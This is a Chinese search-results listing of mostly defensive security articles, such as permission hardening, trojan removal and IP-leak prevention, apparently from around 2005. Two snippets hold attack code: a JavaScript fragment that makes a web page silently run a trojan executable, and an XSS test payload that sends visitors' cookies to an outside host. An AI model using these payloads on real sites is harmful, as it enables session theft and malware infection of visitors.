搜索列表
-
黑客秘籍:Windows下权限设置
【安全相关】 随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。难道我们真的无能为力了吗?其实,只要你弄明白了NTFS系统下的权限设置问题,我们可以对cra...
|黑客|客秘|秘籍|籍W|Wi|in|nd|do|ow|ws|s下|下权|权限|限设|设置|置| -
轻松设置让系统不受恶意代码攻击
【安全相关】 所谓恶意代码,是指网页中使用了利用WSH漏洞来修改系统的一段代码(但是由于它并不具备传染性和自我复制这两个病毒的基本特征,因此不能称作病毒)。WSH是“Windows Scripting Host”的缩写,是微软提供的一种脚本解释机制,它使得脚本文件(扩展名为.js、.vbs等)能够直接在Windo...
|轻松|松设|设置|置让|让系|系统|统不|不受|受恶|恶意|意代|代码|码攻|攻击|击| -
小心你的 ADSL猫被黑
【安全相关】 随着网络的普及,网络安全也越来越被人们所重视。今天就给大家介绍一个很少为人重视的案例。希望大家提高安全意识! 大家都应该知道,现在很多的猫都带有自动拨号功能,我们可以把帐号放在ADSL猫的拨号软件里,这样每次电脑启动的时候ADSL猫就能自动拨号,一打开电脑就能够上网了。而上面的工作...
|小心|心你|你的|的A|AD|DS|SL|L猫|猫被|被黑|黑| -
菜鸟黑客入门攻击及防范技巧
【安全相关】 在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。来看看黑客是如何获知最基本的网络信息——对方的IP地址;以及用户如何防范自己的IP泄漏。 ■ 获取IP “IP”作为Net用户的...
|菜鸟|鸟黑|黑客|客入|入门|门攻|攻击|击及|及防|防范|范技|技巧|巧| -
如何成为一名黑客
【安全相关】 内容一览 为什么会有这份文档? 什么是黑客? 黑客应有的态度 黑客的基本技能 黑客文化中的地位 黑客和书呆子(Nerd)的联系 风格的意义 其它资源 FAQ(常问问题解答) 作为Jargon File的编辑和一些其他有名的类似性质文章的作者,我经常收到充满热情的网络新手的email提问(确实如此) ...
|如何|何成|成为|为一|一名|名黑|黑客|客| -
查找与清除线程插入式木马
【安全相关】 目前网络上最猖獗的病毒估计非木马程序莫数了,特别是在过去的2004年木马程序的攻击性也有了很大的加强,在进程隐藏方面,做了较大的改动,不再采用独立的EXE可执行文件形式,而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等,这些木马也是目前最难对付的。本期就教你查找和清除线程插入式木...
|查找|找与|与清|清除|除线|线程|程插|插入|入式|式木|木马|马| -
黑客如何给你的系统种木马
【安全相关】 相信很多朋友都听说过木马程序,总觉得它很神秘、很高难,但事实上随着木马软件的智能化,很多骇客都能轻松达到攻击的目的。今天,笔者就以最新的一款木马程序——黑洞2004,从种植、使用、隐藏、防范四个方面来为网络爱好者介绍一下木马的特性。需要提醒大家的是,在使用木马程序的时候,请先关闭系统中的...
|黑客|客如|如何|何给|给你|你的|的系|系统|统种|种木|木马|马| -
全力打造个人网络安全之XP篇
【安全相关】 对于网民来说,各种潜在的威胁可能会随时到来。在这些威胁中,往往是“明枪好躲、暗箭难防”,网络病毒,黑客工具大家比较重视,损失相对少一些,但对于利用特殊手段窥探个人隐私的人,却有所忽视。明明已经造成隐私外泄,却毫不知情。所以采取什么样的措施才能确保个人网络安全,必然成为网络用户们最为关...
|全力|力打|打造|造个|个人|人网|网络|络安|安全|全之|之X|XP|P篇|篇| -
网页打开后自动执行木马
【安全相关】<script language="javascript"> run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"" run_exe+="CODEBASE=\"muma.exe#version=1,1,1,1\">" //这里的muma.exe就是我们要运行的程序&n...
网页打开后自动执行木马 -
关于动网的cookie泻露站点绝路径的问题
【安全相关】一、跨站测试 先看看我的一次跨站测试吧 我以职业欠钱的站点做测试吧: Host:zhiyeqianqian.51web.cn My Test: 先在他的论谈上传两张图, 图一的内容是: <script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script> 得到url为UploadFile/2005-6/200562716565...
关于动网的cookie泻露站点绝路径的问题 -
利用Google作黑客攻击的原理
【安全相关】 技术天地:GoogleHacking是利用Google的搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息,最近这种以前由黑客手动进行操作的攻击手段可以通过一种新的蠕虫病毒来自动完成。为了引起大家对GoogleHacking的关注与重视,我们编发了这篇文章希望大家通过对Hack的攻击手段的了解,更好的保护自己...
|利用|用G|Go|oo|og|gl|le|e作|作黑|黑客|客攻|攻击|击的|的原|原理|理| -
HTML中的数据绑定
【CSS/HTML】信息来源:Wayne_Deng的专栏 有没想过在java script中使用recordset?原来在客户端操作数据也可以这样简单,定义一个数据源,将数据绑定在各种tag上,实现应用程序般的效果,酷毙了!(首先申明一点,文章的内容全部来自msdn,不过用我自己的话总结而已。) 先看看这样两个例子: http://msdn.microsoft.com/works...
HTML中的数据绑定